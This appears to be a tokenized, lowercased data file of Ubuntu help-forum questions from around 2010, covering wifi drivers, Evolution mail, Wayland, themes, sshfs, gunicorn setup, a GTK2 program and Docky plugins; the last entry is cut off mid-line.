11442	is there a way to force ubuntu use wpa with my adapter ?	i 've built-in wifi adapter in my notebook ( made 5 years ago ) . latest ( dated 5 years ago ) windows drivers allow it to use wpa . i 'm using lubuntu 10.10 but it allow me to use only wep ( same situation with ubuntu 10.04 ) . is there a way to fix it ? upd : hardware info : ~ $ lspci 00:00.0 host bridge : transmeta corporation longrun northbridge ( rev 03 ) 00:00.1 ram memory : transmeta corporation sdram controller 00:00.2 ram memory : transmeta corporation bios scratchpad 00:03.0 modem : ali corporation m5457 ac'97 modem controller 00:04.0 multimedia audio controller : ali corporation m5451 pci ac-link controller audio device ( rev 02 ) 00:07.0 isa bridge : ali corporation m1533/m1535/m1543 pci to isa bridge [ aladdin iv/v/v+ ] 00:09.0 vga compatible controller : ati technologies inc radeon mobility m6 ly 00:0a.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 00:0b.0 usb controller : nec corporation usb ( rev 43 ) 00:0b.1 usb controller : nec corporation usb ( rev 43 ) 00:0b.2 usb controller : nec corporation usb 2.0 ( rev 04 ) 00:0c.0 cardbus bridge : texas instruments pci4510 pc card cardbus controller ( rev 02 ) 00:0c.1 firewire ( ieee 1394 ) : texas instruments pci4510 ieee-1394 controller 00:0f.0 ide interface : ali corporation m5229 ide ( rev c4 ) 00:11.0 bridge : ali corporation m7101 power management controller [ pmu ] : ~ $ lsusb bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 124a:168b airvast prism3 wlan adapter bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 2001:3c00 d-link corp. [ hex ] airplus g dwl-g122 wireless adapter ( rev.b1 ) [ ralink rt2500usb ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the problem is with bus 002 device 002 : id 124a:168b airvast prism3 wlan adapter . d-link is external usb and works good . i use it to work with net . upd 2 : : ~ $ lsmod module size used by prism2_usb 160970 0 arc4 1165 2 rt2500usb 18049 0 rt2x00usb 9779 1 rt2500usb rt2x00lib 27275 2 rt2500usb , rt2x00usb led_class 2633 1 rt2x00lib mac80211 231541 2 rt2x00usb , rt2x00lib cfg80211 144470 2 rt2x00lib , mac80211 psmouse 59033 0 parport_pc 26058 0 dm_crypt 11385 0 ppdev 5556 0 snd_ali5451 15875 1 snd_ac97_codec 99227 1 snd_ali5451 ac97_bus 1014 1 snd_ac97_codec snd_pcm 71475 2 snd_ali5451 , snd_ac97_codec snd_seq_midi 4588 0 snd_rawmidi 17783 1 snd_seq_midi snd_seq_midi_event 6047 1 snd_seq_midi snd_seq 47174 2 snd_seq_midi , snd_seq_midi_event snd_timer 19067 2 snd_pcm , snd_seq snd_seq_device 5744 3 snd_seq_midi , snd_rawmidi , snd_seq pcmcia 35973 0 snd 49006 9 snd_ali5451 , snd_ac97_codec , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device yenta_socket 21518 0 pcmcia_rsrc 10566 1 yenta_socket i2c_ali15x3 5190 0 serio_raw 4022 0 pcmcia_core 14657 3 pcmcia , yenta_socket , pcmcia_rsrc i2c_ali1535 4865 0 soundcore 880 1 snd snd_page_alloc 7120 1 snd_pcm lp 7342 0 parport 31492 3 parport_pc , ppdev , lp dm_raid45 81721 0 xor 15136 1 dm_raid45 radeon 825934 2 ttm 56633 1 radeon drm_kms_helper 30200 1 radeon drm 168054 4 radeon , ttm , drm_kms_helper 8139too 19581 0 video 18712 0 firewire_ohci 21106 0 efficeon_agp 4794 0 8139cp 16934 0 output 1883 1 video pata_ali 7976 2 firewire_core 46643 1 firewire_ohci agpgart 32011 3 ttm , drm , efficeon_agp mii 4425 2 8139too,8139cp i2c_algo_bit 5168 1 radeon crc_itu_t 1383 1 firewire_core upd 3 : is there a copatible driver with wpa support ?
11443	how can i tell which drivers are backported to stable kernels ?	i was able to help this person by recommending the backported package of driver our kernel team provides . i had a hunch this would work because i happen to have the same hardware . i suspect it might be able to help this person too however i am not sure which drivers get backported . i did a apt-get source linux-backports-modules-wireless-maverick-generic but this just gives me a debian directory with the packaging with no indication of what drivers get included . where can i find which drivers get backported ? ideally i 'd like to find a web page that has this information so i can refer to it for older releases as well .
11444	what is the easiest way to back-up and archive dvd 's to another dvd ?	preferably a all in one software package .
11447	where can i find all the wallpapers ever included ?	is there a place where i can find all the wallpapers ever included on the ubuntu cds ( not just the default ones ) ? ? i remember some nice ones , like the one with the cherries . a package would be great !
11448	festival on orca ?	i tried installing festival from synaptic to use it with orca , but it did not show up on orca 's speech synthesizer list . i installed the following packages : festival festival-freebsoft-utils speech-dispatcher-festival festlex-oald festlex-cmu festvox-kallpc16k festvox-kdlpc16k festlex-poslex festvox-don festvox-ellpc11k
11449	olympus me52 mic not working in ubuntu	my olympus microphone is not working in ubuntu on skype or in the sound recorder application . it works fine on windows 7 without the need for me to ever do anything . my computer does n't have a mic , so i just bought this little one that plugs straight into the mic input . is there anything i need to do to get it working ? it 's annoying because i ca n't skype in ubuntu i have to boot into windows 7 , which i do n't enjoy .
11453	tool for viewing available dbus messages i can send to an application	is there a graphical tool or maybe a command-line one that lists all the messages and parameters/arguments that i can send to a dbus-enabled program ? ? i really want to try scripting some dbus things but i can hardly find any documentation for the dbus capabilities of most applications .
11454	how can i move between workspaces in gnome the same way as in xfce/xubuntu ?	one thing i miss about xfce is the ability to move to the next workspace/desktop by moving the cursor to the edge of the screen . is there a way to do this in gnome ?
11460	printing envelopes in openoffice	i have an epson rx580 multi-function printer , and openoffice refuses to print envelopes on it correctly . i 've tried changing every setting i could , but it keeps on cutting off the return address . has anyone found a solution ? i had researched the matter in vain ... i 'd hate to have to boot into windows just to print an envelope !
11461	postgresql 8.4 for newbies	are there any how-to 's or tutorials about postgresql 8.4 fro doing following things : logging in to postgresql creating database getting into database environment adding or altering the tables sorry for asking this question here . i googled for 3 hrs online without being able to clarify any of my issues . i also tries the ubuntu community wiki , it was n't that much helpful about using a already created database .
11463	delete threaded mails in evolution	how do i delete all mails in a thread in evolution . it is really a difficult task to delete it one by one .
11465	firefox youtube flash player shows as grey box ?	firefox and youtube videos were working after upgrading from 10.04 to 10.10 but a couple of weeks ago , my youtube flash video player shows up as a grey box . the sound still works and i can hear the clip playing , but i can not see the video , or even the controls . this is true for many of the flash based video players , and i think it even happens to some of the flash games out there on firefox . everything works fine on chromium . this is n't that weird because chromium has its own flash plugin . however , some flash players still function properly on firefox , like the full episode flash player on thedailyshow.com why would flash be grey box for some flash players but not all ? i have a 32bit system , and a ati x300 gpu card , which has been giving me problems right after updating to 10.10 , but that seems to be resolved now . i selected the allow proprietary codecs stuff at install , and then installed the adobe flash ppa and plugin in ubuntu tweak .
11468	how to mount a remote ( over ssh ) directory to be available like a local directory ( incl . in shell , not just in gnome ) ?	i 've got my files ( mostly text/code , nothing of heavy like videos etc . ) in a directory on a remote server which i can only access by means of ssh . can i mount it on my laptop to use it seamlessly from all the applications ( incl command-line ones ) ?
11470	how to create a minimal installation in vmware player for browsing ?	i am trying to build a minimal vmware image to use for private browsing ( also called a browser appliance ) . i have tried using images for other small linux distros , most of them are either too heavy ( i do not want any other functionality than browsing and downloading ) or outdated ( dsl , various browser appliance images at vmware official site ) . i have downloaded the minimal ubuntu install image ( 12mb ) and was hoping to select only the needed pakcages while installing but it was not asking for my choices anywhere . i am new to the command line installation and i would be thankful if someone could point out how to install only needed packages , and what are the bare-minimum packages to browse internet ( i plan to use only firefox and transmission )
11473	how to sort or manually arrange evolution mail account names in preferences ?	is there some way i can re-arrange the order of mail account names in evolution 's properties dialog ? i find it strange that this list shows entries in the order in which i add them , and there is no facility to change this order . the column is not sortable , and there are no move-up/down buttons . update : i 'm using ubuntu 10.04 ( 2.6.32-25-generic ) ... evolution 2.28.3
11479	how to lasso-select multiple files in nautilus using the mouse in list-view ?	is there some way that nautilus can be made to select multiple files as a rectangle-select action of the mouse ( lassoo style ) in the list view ? compact and icons view work ok .
11482	a question about git and github	i have a problem . i forked a project in github.com . i made my changes , commited it and pushed to the original ( what i forked ) repo . but in the original repo there are many changes , so i 'd like to merge this with my own fork .
11485	command line games	does anyone know if there are games for ubuntu server ( like tetris , etc ... ) ? i know that servers are n't meant for playing games , but sometimes it would be nice to have a little fun . . . not only work on them : )
11488	klipper pop-up menu does not exist anymore	i have been using klipper as my clipboard manager and it was quiet flexible to use it 's pop-up menu shortcut . but in ubuntu 10.10 it seems that there is no shortcut key to trigger the klipper popup menu . is there anyway to enable the popup menu shortcut for klipper ? .
11490	global - menu applet on maverick	hi , where i can get working on ubuntu 10.10 global-menu applet ? thx = )
11492	repository package transfer	is it possible to easily transfer one pc 's packages into another one either over a network , but mainly through usb or dvd-rom medias ? in another words , to duplicate or copy the installed packages into another one ( think , copy/paste ) .
11503	built in media card reader not working	i have a hp pavilion dv4 laptop and the card reader just does n't work : o it used to work in 10.04 though ... but it does n't seem to be working here . went through many other threads but everybody is saying `` it just works out of the box '' ... : ( sadly it does n't for me ... help !
11508	how do i play m3u8 files ?	i would really like to play m3u8 files ( more specifically , http : //www.nasa.gov/multimedia/nasatv/ntv-public-ips.m3u8 ) but when i try to run it on vlc player , it goes on to multiple .ts files with a very annoying gap between the stream . is there any way i can play this stream on ubuntu just as if i were playing it on an iphone ( which is what the stream is for ) .
11509	is it safe to change my lucid sources to maverick , to get one app , then revert to lucid ?	i am considering to temporarily change my repositories to maverick , on a lucid system . i want to install a newer version of evolution because it has a particular feature i want . i do n't want to apply general maverick updates.. i 'm only interested in evolution ... my reason for this it to let apt/synaptic sort out the dependencies ... i suspect this could be pretty dicey if i allowed anything more than just a simple single app , but even then , it may be a bad move.. am i courting disaster here ?
11519	where to find great themes ?	other than the normal sites ( ie : gnome-look , webup8 , omgu , etc )
11529	where are the calendar , task and notes views in latest update of evolution from ubuntu 10.10 ?	i have just updated my system and it looks like evolution calendar , tasks and notes views are no longer available . any idea about what has happened ?
11534	youtube streaming is not working on totem	this is the error i got while clicking on the videos on the right pane . `` could not open location ; you might not have permission to open the file . '' i had a inspection on totem plugs and found that there is no youtube.py in this directory ( /usr/lib/totem/plugins/youtube/ )
11535	how to setup a mouse shortcut to raise window if it 's covered by another window , otherwise lower it ?	i 'd like to raise window if it 's covered by another window , otherwise lower it , with some shortcut mouse ( click + extra keys ) . knowing that a window ( that you are interested in ) is in a region close of where your mouse is you can , you can scan the windows which are under your mouse . this was possible before in some older gnome desktop . and this is also possible on the cde of solaris .
11537	why is wayland better ?	as recently announced by mark shuttleworth , ubuntu will be moving towards using wayland as its display manager . what are biggest differences between x11 and wayland ? why will wayland make ubuntu better ?
11538	long wait time on login	when i log in on my server i get this : no mail . last login : fri nov 5 14:22:45 2010 ... then i must wait for 5 sec and then is ready ... wolfy @ ubuntu-server : ~ $ is this wait time normal or should i do something to `` repair '' this ?
11542	is there an ambiance theme available for windows ?	i tend to run windows apps with virtualbox in seamless mode ( so that virtualized windows applications windows and windows taskbar appear alongside host os windows instead of a separate virtual machine screen ) . to make the experience even more `` seamless '' i 'd like windows theming ( especially windows ' title bars and a taskbar ) to look exactly as ubuntu windows look . so it seems that i need a windows clone of ubuntu ambiance theme . is there one ? i 'm ok to have windows minimize/maximize buttons on the right , as i 've switched ubuntu to the same classic mode . i am interested in both windows xp and windows 7 themes .
11550	software centre takes an age to load	i have a fast computer ( great processor , good ssd ) but software centre takes a good 30 seconds to load up . this is n't a whinge , i think there could be something wrong . synaptic takes a second to load . i ran strace software-center to see if it was thrashing the disk ( it 's an ssd - i ca n't hear it ) and it 's statting and attempting to open a whole shed-load of files . here 's an excerpt : open ( `` /usr/local/lib/python2.6/dist-packages/flexget-1.0r1465-py2.6.egg/stringiomodule.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/flexget-1.0r1465-py2.6.egg/stringio.py '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/flexget-1.0r1465-py2.6.egg/stringio.pyc '' , o_rdonly ) = -1 enoent ( no such file or directory ) stat ( `` /usr/local/lib/python2.6/dist-packages/progressbar-2.3_dev-py2.6.egg/stringio '' , 0x7fff19d3af30 ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/progressbar-2.3_dev-py2.6.egg/stringio.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/progressbar-2.3_dev-py2.6.egg/stringiomodule.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/progressbar-2.3_dev-py2.6.egg/stringio.py '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/progressbar-2.3_dev-py2.6.egg/stringio.pyc '' , o_rdonly ) = -1 enoent ( no such file or directory ) stat ( `` /usr/local/lib/python2.6/dist-packages/pynzb-0.1.0-py2.6.egg/stringio '' , 0x7fff19d3af30 ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pynzb-0.1.0-py2.6.egg/stringio.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pynzb-0.1.0-py2.6.egg/stringiomodule.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pynzb-0.1.0-py2.6.egg/stringio.py '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pynzb-0.1.0-py2.6.egg/stringio.pyc '' , o_rdonly ) = -1 enoent ( no such file or directory ) stat ( `` /usr/local/lib/python2.6/dist-packages/pyrss2gen-1.0.0-py2.6.egg/stringio '' , 0x7fff19d3af30 ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pyrss2gen-1.0.0-py2.6.egg/stringio.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pyrss2gen-1.0.0-py2.6.egg/stringiomodule.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pyrss2gen-1.0.0-py2.6.egg/stringio.py '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pyrss2gen-1.0.0-py2.6.egg/stringio.pyc '' , o_rdonly ) = -1 enoent ( no such file or directory ) stat ( `` /usr/local/lib/python2.6/dist-packages/html5lib-0.90-py2.6.egg/stringio '' , 0x7fff19d3af30 ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/html5lib-0.90-py2.6.egg/stringio.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/html5lib-0.90-py2.6.egg/stringiomodule.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/html5lib-0.90-py2.6.egg/stringio.py '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/html5lib-0.90-py2.6.egg/stringio.pyc '' , o_rdonly ) = -1 enoent ( no such file or directory ) stat ( `` /usr/local/lib/python2.6/dist-packages/pyyaml-3.09-py2.6-linux-x86_64.egg/stringio '' , 0x7fff19d3af30 ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pyyaml-3.09-py2.6-linux-x86_64.egg/stringio.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pyyaml-3.09-py2.6-linux-x86_64.egg/stringiomodule.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pyyaml-3.09-py2.6-linux-x86_64.egg/stringio.py '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/pyyaml-3.09-py2.6-linux-x86_64.egg/stringio.pyc '' , o_rdonly ) = -1 enoent ( no such file or directory ) stat ( `` /usr/local/lib/python2.6/dist-packages/transmissionrpc-0.6-py2.6.egg/stringio '' , 0x7fff19d3af30 ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/transmissionrpc-0.6-py2.6.egg/stringio.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/transmissionrpc-0.6-py2.6.egg/stringiomodule.so '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/transmissionrpc-0.6-py2.6.egg/stringio.py '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/local/lib/python2.6/dist-packages/transmissionrpc-0.6-py2.6.egg/stringio.pyc '' , o_rdonly ) = -1 enoent ( no such file or directory ) this might be a red herring . later on it pauses at this : poll ( [ { fd=3 , events=pollin } ] , 1 , 25000 ) = 1 ( [ { fd=3 , revents=pollin } ] ) recvmsg ( 3 , { msg_name ( 0 ) =null , msg_iov ( 1 ) = [ { `` l\2\1\1\v\0\0\0\3\0\0\0=\0\0\0\6\1s\0\7\0\0\0:1.3497\0 '' ... , 2048 } ] , msg_controllen=0 , msg_flags=msg_cmsg_cloexec } , msg_cmsg_cloexec ) = 91 recvmsg ( 3 , 0x7fff8c57cc00 , msg_cmsg_cloexec ) = -1 eagain ( resource temporarily unavailable ) sendmsg ( 3 , { msg_name ( 0 ) =null , msg_iov ( 2 ) = [ { `` l\1\0\1\0\0\0\0\3\0\0\0 { \0\0\0\1\1o\0\32\0\0\0/com/ubu '' ... , 144 } , { `` '' , 0 } ] , msg_controllen=0 , msg_flags=0 } , msg_nosignal ) = 144 poll ( [ { fd=3 , events=pollin } ] , 1 , 25000 and then it does it again ... these two pauses account for most of the load time . and then it really flips out with thousands of poll/read/temporarily unavailable lines . so what on earth is going on here ? why is software centre scanning what looks to be any possible python package looking for stringio ? bug ? then why is it stalling at what looks like a web-request to something.ubuntu.com ( ca n't see the full message ) ? why is it talking to ubuntu.com anyway ?
11552	how can i rearrange the order of oses in the boot menu ?	i installed ubuntu 10.10 with windows 7 ultimate in dual boot configuration . everything seems to be working fine . i have a small doubt , is it possible to re-arrange the boot menu that appears when you start your machine ? currently ubuntu is at top and windows is the very last one . if we dont make a choice for some seconds , it automatically boots ubuntu ( default ) . can i swap this with windows being default in case user doesnt make any choice ?
11553	is there a way to determine what packages were installed on a particular date , say yesterday for example ?	like a log , or a command or something of that nature ?
11566	problems with gtk2 programming	i 'm starting to learn c and gtk2 . so , i find tutorial at zetcode.com , and try to make a little program , but it does n't want to start . i 'm doing exactly as in tutorial , but there 's some bug in my code . # include < stdio.h > # include < gtk/gtk.h > int count = 0 ; char buf [ 5 ] ; void increase ( gtkwidget *widget , gpointer label ) { count++ ; sprintf ( buf , `` % d '' , count ) ; gtk_label_set_text ( label , buf ) ; } void decrease ( gtkwidget *window , gpointer label ) { count -- ; sprintf ( buf , `` % d '' , count ) ; gtk_label_set_text ( label , buf ) ; } int main ( int argc , char** argv ) { gtkwidget *label ; gtkwidget *window ; gtkwindow *frame ; gtkwindow *plus ; gtkwindow *minus ; gtk_init ( & argc , & argv ) ; window = gtk_window_new ( gtk_window_toplevel ) ; gtk_window_set_position ( gtk_window ( window ) , gtk_win_pos_center ) ; gtk_window_set_default_size ( gtk_window ( window ) , 200 , 100 ) ; gtk_window_set_title ( gtk_window ( window ) , `` math '' ) ; frame = gtk_fixed_new ( ) ; gtk_container_add ( gtk_container ( window ) , frame ) ; plus = gtk_button_new_with_label ( `` + '' ) ; gtk_widget_set_size_request ( plus , 80 , 35 ) ; gtk_fixed_put ( gtk_fixed ( frame ) , plus , 50 , 20 ) ; minus = gtk_button_new_label ( `` - '' ) ; gtk_widget_set_size_request ( minus , 80 , 35 ) ; gtk_fixed_put ( gtk_fixed ( frame ) , minus , 50 , 20 ) ; label = gtk_label_new ( `` 0 '' ) ; gtk_fixed_put ( gtk_fixed ( frame ) , label , 190 , 58 ) ; gtk_widget_show_all ( window ) ; g_signal_connect ( window , `` destroy '' , g_callback ( gtk_main_quit ) , null ) ; g_signal_connect ( plus , `` clicked '' , g_callback ( increase ) , label ) ; g_signal_connect ( minus , `` clicked '' , g_callback ( decrease ) , label ) ; gtk_main ( ) ; return 0 ; } pls , help .
11570	how do i install adobe air using `` ubuntu software centre ''	i tried : launching ubuntu software centre i typed in `` air '' and found `` adobe air '' it says `` available from the 'maverick-partner ' source . and has a button `` use this source '' i clicked `` use this source '' , i saw a `` in progress ( 1 ) '' icon come up in the side bar , and disappear , but nothing happened/changed . i 'm stuck . i have actually already added the maverick-partner source to apt so i could install sun-java6-jdk .
11573	what does `` fix committed '' mean ?	is it valid if i mark a bug `` fix committed '' if the package in question is hosted upstream ( outside of launchpad ) ? example : bug report , committed fix .
11575	what are some ides for c/gtk2	what is the best ide for c + gtk2 programming ? i currently use gedit and try monodevelop .
11580	where can i find wayland ?	mark shuttleworth writes that wayland will be replacing x in the future in ubuntu . where can this software be found ?
11588	what 's the best wireframing tool ?	i 'm looking for something similar to iplotz or mockup . i 've found the pencil project , but it requires xulrunner-1.9 ( which seems to be incompatible with xulrunner-1.9.2 ) in order to run as a standalone application . it can be used as a firefox plugin ... but it is a bit slower . the error on my desktop ( ubuntu 10.04 ) is : could not find compatible gre between version 1.9.1 and 1.9.2 . * does anyone know other software ? edit : open-source software is preferred , and it does n't matter whether or not it 's free .
11590	how will wayland be delivered ?	mark just announced support for wayland in ubuntu in future . i was just wondering the following ( hopefully mark can answer ) . when will a version be available to test ? will it be available as a package ( s ) in the repository or will it be delivered as its own distribution ? when do you expect it to take over as the default ?
11592	what does dsfg as a part of package names mean ?	i know the general format for package names in debian and ubuntu . some packages have additions to the standard numbering scheme with obvious meaning like svn20090426 etc . but also quite a few packages have dsfg in their name ( e.g . 2:1.0~rc4~try1.dsfg1-1ubuntu1 ) â what does that mean ? is it just a typo of the debian free software guidelines ( dfsg ) ?
11601	command line tools in one language , system in another	i am not native english speaker , so my ubuntu language is different , and it 's ok : ) but i would like to have command line tools ( svn , for example ) to print messages in english , and not in my system language . why , you ask ? it 's because lots of tutorials are in english , and it 's imho more convenient to use command line that way . so , how to set command line programs to english , and system to another language ?
11606	pairing bluetooth input device does not work	i try to get my bluetooth keyboard 'keysonic ack-540bt ' working . everytime i try to pair it with my computer ( ubuntu 10.10 ) , it fails . the numbers which i have to type are never accepted . the keyboard is visible in blueman gui and i got my trust bt-mouse working . do you have any suggestions ? thanks a lot !
11610	what is an alternative to powerdesigner or ibm rational rose ?	i need a powerful development manager like sybase power designer or ibm rational rose that support use-case , sequence diagram , data flow diagram and ... can somebody suggest a good alternative ?
11611	how do i install themes ?	i am very new to ubuntu and after spending a day or two with it , i think i really liked it . its very flexible and there is so much that you can do . i want to install nice themes on machine . whats the best place to get it ? i found this link , but it talks about ubuntu jaunty ? will this work for me on ubuntu 10.10 ? if you have any other nice suggestions for themes please share .
11612	utilities to overclock ati radeon graphic card	is it possible to overclock my radeon hd2400 xt graphics card under ubuntu ? which application is needed ? i have the proprietary driver installed .
11622	is there a ppa with a wayland build i can use ?	it seems like wayland is coming to ubuntu in the distant future . being the curious type , i thought i would give it a try . i was going to build it myself , but wanted to save myself the trouble if there was a ppa somewhere i could use instead . is there a ppa anywhere i can use to try out wayland ?
11626	linkedin to broadcast	how add linkedin to broadcast ?
11633	can you recommend a good modern gui download manager ( wget wrapper ? )	`` downloader for x '' looks , heh , not fitting well into ubuntu theme and not very natural/convenient . at the same time i do n't know of any good alternative . maybe you know ?
11634	how can i substitute colons when i rsync on a usb key ?	i would like to backup my mail directory on a usb key . however , my imap has a strange naming convention that something include a colon ( : ) character . since the usb is in a window format , rsync fail to create those file . is there a way to replace the colon character by an underscore when running rsync ? ( or to do the same synchronization with another tool ? ) just a few point that i clarified in the comments : this is a worst case scenario backup , i would like to be able to read it on a windows machine without installing anything . i got a lot of data that stay constant . so i save a lot of time if i have a tool that just copy the newer files . i am not looking for a rewrite of rsync . i am looking for a existing tool that can be used out of the box . thanks
11635	problem updating 8.10 intrepid to 9.04 jaunty using do-release-upgrade ?	wondering if anyone has run into this . i 'm trying to do a `` do-release-upgrade '' and what i receive is : an upgrade from 'intrepid ' to 'karmic ' is not supported with this tool . i realize you ca n't go from 8.10 to 10.04 , but i 'd like to go from intrepid to jaunty . i 've made sure all of the packages are up to date .
11638	why ca n't i send message from indicator applet with evolution	my problem is , when i try to send a message with evolution using the indicator message applet 's write new message option , after i click on the send message button , the window just disappears and my message is not sent . if i open the main evolution window and click on send/receive then everything is ok. is this a bug in evolution or do i miss something ? it seems like , when i use just the indicators quick sending option evolution quits before sending the message . anybody has the same problem ? should i report this or it is a known bug ? thanks
11641	slow files transfers between pidgin/empathy and msn/wlm	i always get low transfer rate by sending or receiving files to msn/wlm . what can i do to solve that ? tks
11647	what is the state-of-the-art for using broadcom crystal hardware ?	i just bought a dell mini 1012 , which comes with a broadcom crystal media accelerator chip . i 'd like to know what is the current state-of-the-art with regard to using this hardware on ubuntu ? what i mean by this is , what is the best way to install drivers to make use of this hardware , and what media players currently support it ? i 've read that xbmc currently does , but what about gstreamer ? ideally , i 'd like to find a solution so that i can accelerate flash videos using the device . it seems like one strategy may be to download flash videos to the hard drive and play them with an external , crystal-enabled media player , and so that seems like one option , but i 'm wondering if any of the free flash alternatives ( gnash and lightspark ) support hardware acceleration of flash video using the crystal api ? it seems like there is a lot of information about all of this on the web , but it 's not consolidated , and seems like a rapidly moving target , so any insight anyone may have into this would be appreciated .
11651	remastersys : how to make the .iso smaller than 700mb ?	i 'm trying to create a live cd .iso image of my ubuntu 10.10 installation with remastersys . the problem with this , is that it creates .iso 's of about 750-770 mbs , i need the images to be less than 700mb so that i can burn the .iso on a cd . how can i do this ? can i remove some programs or some features of ubuntu to lessen the space ?
11656	how do i enable the compiz atlantis effect ?	although i have downloaded compiz , ccsm , compiz-plugins , compiz-fusion-plugins-main and compiz-fusion-plugins-extra , i still can not find how to activate the famous atlantis effect . in the `` effects '' category , i can choose the gears in the cube but not the aquarium . i really would have liked to see fishes swimming around in my desktop .
11668	are there still plans to implement transparency ( rgba ) in ubuntu 's theme ?	a while back there was a lot of talk about canonical implementing subtle transparency in gtk for ambiance and radiance themes - is this no longer on the agenda ? was there a hold up ?
11673	is there software that can recognise which musical notes i am playing into my microphone - to help me practice music ?	to help me practice music , i 'd like to make a sound ( hum , sing or whistle into my microphone ) and have the corresponding note displayed on screen . a program that gives feedback live ( while i play ) would be ideal , but giving feedback on a recording would also be acceptable .
11676	how do i setup gunicorn ?	upstart does n't like to start gunicorn because it tries to call setpgrp ( see github issue ) , what would be the best way to start [ gunicorn ] on a 10.04.1 server install ? - ideally with automatic restarting of the failed main process and multiple workers . on the gunicorn site they mention [ runit ] and [ supervisord ] , is it worthwhile installing another kind of process supervisor alongside ubuntu 's upstart ? i 'll document progress here after exams if someone does n't come up with a better solution . ok i 've tried : respawn respawn limit 10 5 expect daemon # also tried expect fork exec python /path/to/manage.py run_gunicorn -- daemon but i ca n't seem to get the job to start , it just hangs ? nothing shows up in ps aux | grep manage or the syslog , i 'm guessing upstart is n't catching the fork properly . is it because i 'm using manage.py instead of gunicorn directly ? i 'll give running it directly a shot as soon as i get a chance . clarification : manage.py is from a django 1.2 instance with gunicorn as an installed app , but no special settings in settings.py ( i do n't know the syntax for specifying gunicorns port/address/workers in settings.py so i was planning to just use cmdline args )
11678	removing evolution mail related options on top-panel	i would like to remove all the mail-related options from the top panel while keeping the chat and broadcast options on the unity top panel . how can i do this ?
11688	do '..-backports ' repositories automatically take precedence over the standard repos ? in sources.list	is the order of ..-backports repositories in sources.list significant ? ... or does ..-backports take precedence over the standard entries , regardless of placement ? are the two following examples effectively the same ? deb http : //archive.ubuntu.com/ubuntu lucid-updates main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu lucid-backports main restricted universe multiverse vs. deb http : //archive.ubuntu.com/ubuntu lucid-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu lucid-updates main restricted universe multiverse
11689	docky bookmarks and mounted drives plugins wo n't work	i recently installed kde in ubuntu , and to my surprise , docky works in kde ( dunno really ) . after two minutes of testing , i realized that i wanted gnome more , so i decided to uninstall kde desktop . before uninstalling , i tried to make nautilus the default file manager in kde , clicking apply and everything after getting back to pure gnome ... docky wo n't open my bookmarks , except the computer icon ... the bookmarks were the ones in the sidebar . how can i fix it so that i can use my bookmarks in gnome again ? ps : i tried dragging and dropping the bookmarks ( which are viewable in places menu ) to the dock and clicking it wo n't open it . i tried running it from the terminal and after clicking a bookmark , here 's this error : [ error 12:04:04.979 ] [ systemservice ] error opening files . the application does n't support files/uris or was n't found . runing it from docky -- debug [ info 09:48:12.145 ] docky version : 2.0.7 release [ info 09:48:12.249 ] kernel version : 2.6.35.22 [ info 09:48:12.250 ] clr version : 2.0.50727.1433 [ debug 09:48:15.171 ] [ userargs ] buffertime = 0 [ debug 09:48:15.171 ] [ userargs ] maxsize = 2147483647 [ debug 09:48:15.171 ] [ userargs ] netbookmode = false [ debug 09:48:15.171 ] [ userargs ] nopollcursor = false [ debug 09:48:16.057 ] [ pluginmanager ] plugin manager initialized . [ info 09:48:16.190 ] [ dockcontroller ] setting theme : smoke [ info 09:48:17.677 ] [ pluginmanager ] loaded `` docky.widgets,1.0 '' . [ info 09:48:17.685 ] [ pluginmanager ] loaded `` docky.widgets,1.0 '' . [ info 09:48:17.685 ] [ pluginmanager ] loaded `` clock '' . [ info 09:48:17.712 ] [ pluginmanager ] loaded `` trash '' . [ info 09:48:17.873 ] [ pluginmanager ] loaded `` battery monitor '' . [ debug 09:48:17.943 ] [ 